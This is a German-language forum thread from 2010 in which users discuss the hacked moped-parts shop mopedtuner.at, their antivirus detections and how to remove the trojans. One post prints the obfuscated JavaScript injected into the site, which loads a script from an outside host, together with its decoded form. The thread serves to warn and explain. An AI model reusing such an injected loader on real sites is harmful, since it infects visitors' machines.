Mopedtuner.at GEHACKT xD?

[XsonicX]

Tach zusammen,

^^ Wollt mal nachfragen was mit Mopedtuner.at los ist haha ? Scheint so als wurde es gehackt oder? ..

Betreten der Seite auf eigene Gefahr!!

Wisst ihr mehr?

mfg

bearbeitet July 9, 2010 von XsonicX

[XsonicX]

Tag!

Ich verschieb das ganze mal in den Offtopic Bereich.

Hm, bei mir lässt sich die Seite überhaupt nicht öffnen. Der Besitzer ist ja gerade im Urlaub, der wird sich schon darum kümmern wenn er zurück ist.

Tja, ich und ein Freund von mir bekommen einen VIRUS!! Malware.

"Fehlende Plugin" NICHT INSTALLIEREN!

[TCE Racing Team]

bei mir funkt die seite überhaupt nicht mehr^^

[XsonicX]

bei mir funkt die seite überhaupt nicht mehr^^

Mein Antivirus fand eine Maleware, also vorsicht geboten . Bei einem Freund wurde ein Trojaner gefunden .

mfg

[SiXaM]

Ich komme net mal mehr Drauf! xD

[thefelix.]

Kaspersky schlägt auch Alarm..

[aL3x^]

Ich bin der User von dem da XsonicX spricht.

Bin auf die Seite gangen um was nachzusehen, auf einmal schlug Antivir Alarm.

Jetzt hab ich 4 Malware Viren oben. Trojan ist auch dabei -.-'

3 hab ich einstweilen schon wegbekommen. Setzten sich wie immer bei mir bei den Bildern ab und vervielfachten diese, komisch aber wahr. Hab alle gelöscht und jetzt ists vorbei.

Nur im Firefox sitzt noch einer -.-

Werd ich deinstallieren und dann komplett löschen. Werds schon wegbekommen.

MfG Al3x

[XsonicX]

Ich bin der User von dem da XsonicX spricht.

Bin auf die Seite gangen um was nachzusehen, auf einmal schlug Antivir Alarm.

Jetzt hab ich 4 Malware Viren oben. Trojan ist auch dabei -.-'

3 hab ich einstweilen schon wegbekommen. Setzten sich wie immer bei mir bei den Bildern ab und vervielfachten diese, komisch aber wahr. Hab alle gelöscht und jetzt ists vorbei.

Nur im Firefox sitzt noch einer -.-

Werd ich deinstallieren und dann komplett löschen. Werds schon wegbekommen.

MfG Al3x

hm, bei mir wars nur ein maleware. xD

naja, solche Server welche nicht großartig geschäftlich verwendet werden sind einfach und gefunde Fressen zum hacken.

[XsonicX]

Tag!

Na toll, zweimal Malware... aber egal, läuft eh in der "Sandbox".

Danke an xsonicx für die Meldung.

Sandbox?

Bedankt euch Bei Al3x^ . Der hats bemerkt und ich wollte mal fragen ob ihr mehr dazu wisst.

Ein Professor von uns (Er ist ein Tr***el xD) hatte auch nen Server... ~ 1 Monat lang dann war er gehackt. :/

Wie gesagt, Vorsicht. Mein Antivir Läuft grade und hat nochwas Gefunden :S. noch ein Malware -.-

mfg

/e: TR/VB.Inject.53248.DG

Verbreitungsmethode:

• Autorun Dateien

• Lokales Netzwerk

• Messenger

Aliases:

• Mcafee: W32/IRCbot virus

• Sophos: Mal/VBInject-D

• Panda: Trj/Kreeper.H

• Eset: Win32/AutoRun.KS

• Bitdefender: Trojan.Generic.3546827

Betriebsysteme:

• Windows 2000

• Windows XP

• Windows 2003

Auswirkungen:

• Lädt eine schädliche Dateien herunter

• Erstellt schädliche Dateien

• Änderung an der Registry

• Ermöglicht unbefugten Zugriff auf den Computer

Name: TR/VB.Inject.61441.DA

Entdeckt am: 12/03/2010

Art: Trojan

In freier Wildbahn: Ja

Gemeldete Infektionen: Niedrig bis mittel

Verbreitungspotenzial: Mittel

Schadenspotenzial: Mittel

Statische Datei: Ja

Dateigröße: 61.441 Bytes

MD5 Prüfsumme: 7cc9b28b3279b99fbf294180df9e4ecd

IVDF Version: 7.10.05.64 - Fri, 12 Mar 2010 12:46 (GMT+1)

Ist sogar "neu".. 12.03.2010 entdeckt

bearbeitet July 9, 2010 von XsonicX

[XsonicX]

Tag!

"Sandbox" gehört zu Comodo Internet Security Dingens. Da kannst du unbekannte Programme starten ohne befürchten zu müssen, dass diese Schaden an dem System anrichten. Wobei ein Restrisiko bleibt immer...

Ist fast das gleiche wie "Virtual Pc" von Microsoft. Nur mit dem Program von Microsoft kannst du viel geile Dinge anstellen.

Aso xD. Hab ich grade im google angeschaut. Hört sich interessant an, muss ich mir auch mal zulegen. Danke

[Derbi_Gaber]

Mensch, lasst doch mopedtuner.at in Ruhe^^

Die Seite is ja jetzt off (absichtlich oder nicht sei dahingestellt).

Leider is das Problem eben bei der Shop-Software osCommerce das sie ein rießen Sicherheitsloch im File-Manager hat, und somit das ändern beliebiger Seiten ohne iwelche Überprüfung zulässt. Es gab sogar ein Exploit dazu (gab!), was die Arbeit der Scriptkiddies sicher erleichtert hat.

Fehler wurde gemeldet, Beispiel wurde auch gezeigt, wenn man nix dagegen tut is man leider selbst schuld.

erli.at basiert aufs gleiche System, doch bei dem wär das nicht möglich, da er die erforderlichen Sicherheitsmaßnahmen getroffen hat.

mfg

[aL3x^]

Hab gestern AntiVir nochmals durchlaufen lassen.

Die 4 Malwares sind weg, hab ich scheinbar alle beseitigen können, zumindest 3 davon. Der 4.te sitzt im Firefox, bin mir aber nicht sicher ob der nicht auch schon weg ist.

Ka, bin der ur Noob in Sachen Computer^^

Leider hat er beim gestrigen Durchlauf einen neuen Virus ausgespuckt -> JAVA/Agent.N

Lass es gerade nochmals durchlaufen, mal schaun was er diesmal sagt :/

Mfg Al3x

Edit:

Die waren als erstes oben wie ich Mopedtuner.at aufgemacht hab:

TR/Vundo.gen [trojan]

TR/Vundo.gen

TR/Vundo.Gen

EXP/Pdfka.aog.1465

bearbeitet July 10, 2010 von aL3x^

[Derbi_Gaber]

@alex:

Probier das Prog hier: VundoFix by Atribune

Es is speziell für den Vundo Trojaner ausgelegt, da der n ganz arger Hund is...

Das mit JAVA und dem EXPloit hängt zusammen, so konnte der Trojaner auf deinen PC gelangen!

mfg

[aL3x^]

Danke =D

Werd ich gleich mal ausprobieren.

Jetzt is noch ein Trojaner dezugekommen, nachm 2.ten Durchlauf halt -.-

TR/Siqqen.A

MfG Al3x

[**яaphi**]

ich kann keine bilder anschauen!!????

mfg.

[joban#]

na gut das ich ubuntu benütze xD

also ich würd zu zeit keine kontodaten auf mopedtuner.at eingeben die sind bestimmt dann iwo und nach ner zeit is das geld auch weg. denk mal das wegen dem solche seiten gehackt werden...

[Derbi_Gaber]

äh.. ja...

jetzt is es klar, die seite nimmt verbindung mit ner gefährlichen seite auf >_>

und da derbi-gpr nicht on ist, siehst wirklich gefährlich aus...

<script type="text/javascript">var nhZE2uSD="Ow8xN18Ow8xN31";var usW1446O0="Ow8xN3cOw8xN73Ow8xN63Ow8xN72"; var usW1446O1="Ow8xN69Ow8xN70Ow8xN74Ow8xN20"; var usW1446O2="Ow8xN74Ow8xN79Ow8xN70Ow8xN65"; var usW1446O3="Ow8xN3dOw8xN22Ow8xN74Ow8xN65"; var usW1446O4="Ow8xN78Ow8xN74Ow8xN2fOw8xN6a"; var usW1446O5="Ow8xN61Ow8xN76Ow8xN61Ow8xN73"; var usW1446O6="Ow8xN63Ow8xN72Ow8xN69Ow8xN70"; var usW1446O7="Ow8xN74Ow8xN22Ow8xN20Ow8xN73"; var usW1446O8="Ow8xN72Ow8xN63Ow8xN3dOw8xN22"; var usW1446O9="Ow8xN68Ow8xN74Ow8xN74Ow8xN70"; var usW1446O10="Ow8xN3aOw8xN2fOw8xN2fOw8xN61"; var usW1446O11="Ow8xN6eOw8xN6eOw8xN6fOw8xN75"; var usW1446O12="Ow8xN2eOw8xN73Ow8xN65Ow8xN72"; var usW1446O13="Ow8xN76Ow8xN65Ow8xN68Ow8xN74"; var usW1446O14="Ow8xN74Ow8xN70Ow8xN2eOw8xN63"; var usW1446O15="Ow8xN6fOw8xN6dOw8xN2fOw8xN2f"; var usW1446O16="Ow8xN6dOw8xN6cOw8xN2eOw8xN70"; var usW1446O17="Ow8xN68Ow8xN70Ow8xN22Ow8xN3e"; var usW1446O18="Ow8xN20Ow8xN3cOw8xN2fOw8xN73"; var usW1446O19="Ow8xN63Ow8xN72Ow8xN69Ow8xN70"; var usW1446O20="Ow8xN74Ow8xN3e"; var JgUg10US="g4Uuq18Ow8xN31";var Q8NVsUq5=usW1446O0+usW1446O1+usW1446O2+usW1446O3+usW1446O4+usW1446O5+usW1446O6+usW1446O7+usW1446O8+usW1446O9+usW1446O10+usW1446O11+usW1446O12+usW1446O13+usW1446O14+usW1446O15+usW1446O16+usW1446O17+usW1446O18+usW1446O19+usW1446O20; CvhvkAeR=Q8NVsUq5.replace(/Ow8xN/g,"%");var KcQGBJKD=unescape;var nhZE2uSD="cZLH618g4Uuq31";q9124=this;var WrEGuKeo=q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")];WrEGuKeo.write(KcQGBJKD(CvhvkAeR));</script><!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">

in klartext:

<script type="text/javascript" src="http://annou.servehttp.com//ml.php"> </script>

das geniale an dem hacker, er hat das admin-verzeichnis gelöscht/umbenannt, sonst könnte man ihn ja löschen >_>

bearbeitet July 10, 2010 von Derbi_Gaber

[Black Jack]

ich kann keine bilder anschauen!!????

mfg.

das war vorher auch schon

Glaubts das es von 2stroke wer war? ^^

[Bernilu_]

Ich wars

[Black Jack]

Ich wars

Nein. Du hättest eine Schwulenpornoseite daraus gemacht

[Bernilu_]

Nein. Du hättest eine Schwulenpornoseite daraus gemacht

Mit deinem Bild auf da Startseite <33

[Black Jack]

Mit deinem Bild auf da Startseite <33

[Der_böse_Mann]

microsoft secruity essentials zeigt nen schwerwiegenden trojaner an ^^

[Genericxer]

muahaha, ich finds lahm das man das cniht schnell behbt, einfach bakup drüber und alles ist wieder da aber naja, hab das mal meinen lehrer in der htl gezeigt und der hat nurmehr gelacht XDD das einfachste vom einfachen scriptkiddies eben, so wie ich

aja wenns wen interresiert ip von mopedtuner is 77.244.243.39 und wenn man da drauf geht funzt die seite nicht mehr weil der scipt geändert wurde, also Haaaaaack XD

mfg.!

[XsonicX]

muahaha, ich finds lahm das man das cniht schnell behbt, einfach bakup drüber und alles ist wieder da aber naja, hab das mal meinen lehrer in der htl gezeigt und der hat nurmehr gelacht XDD das einfachste vom einfachen scriptkiddies eben, so wie ich

aja wenns wen interresiert ip von mopedtuner is 77.244.243.39 und wenn man da drauf geht funzt die seite nicht mehr weil der scipt geändert wurde, also Haaaaaack XD

mfg.!

Paulpanzer ist leider im Urlaub

mfg